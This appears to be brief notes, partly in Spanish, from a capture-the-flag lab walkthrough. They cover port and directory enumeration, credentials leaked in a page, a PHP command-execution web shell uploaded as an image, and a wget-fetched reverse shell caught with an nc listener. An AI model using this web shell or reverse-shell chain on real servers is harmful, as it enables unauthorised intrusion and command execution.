192.168.111.135

Goal: get UID 0 (root) and read the special flag file.

nmap -sV -O -Pn 192.168.111.135
  PORT   STATE SERVICE VERSION                                                                                                                                                                                                               
  80/tcp open  http    Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
  
uniscan -u 192.168.111.135 -qweds
  E-mails:
  | [+] E-mail Found: kevinh@kevcom.com
  | [+] E-mail Found: mike@hyperreal.org



dirb http://192.168.111.135/ -z 100
/robots.txt
  Disallow: /cola
  Disallow: /sisi
  Disallow: /beer
Ninguna devuelve nada

/fristi
  TODO:
  We need to clean this up for production. I left some junk in here to make testing easier.

  - by eezeepz
  
  Imagen en b64 en código fuente: keKkeKKeKKeKkEkkEk
  
  Entramos con eezeepz:keKkeKKeKKeKkEkkEk

/fristi/upload.php
/fristi/uploads/cat.png

/fristi/uploads/shell.php.jpg
  <?php
  if($_GET['cmd']) {
          system($_GET['cmd']);
  }
   ?>

/fristi/uploads/shell.php.jpg?cmd=ls

/fristi/uploads/shell.php.jpg?cmd=id
  uid=48(apache) gid=48(apache) groups=48(apache)
  
http://192.168.111.135/fristi/uploads/shell.php.jpg?cmd=find%20/%20-name%20wget
  /usr/bin/wget

cp /usr/share/webshells/php/php-reverse-shell.php ./
Ponemos nuestra IP y puerto
http://192.168.111.135/fristi/uploads/shell.php.jpg?cmd=wget%20192.168.111.128/php-reverse-shell.php
nc -nlvp 2222
192.168.111.135/fristi/uploads/php-reverse-shell.php
Y tenemos shell

cat /proc/version
Linux version 2.6.32-573.8.1.el6.x86_64 (mockbuild@c6b8.bsys.dev.centos.org) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-16) (GCC) ) #1 SMP Tue Nov 10 18:01:38 UTC 2015
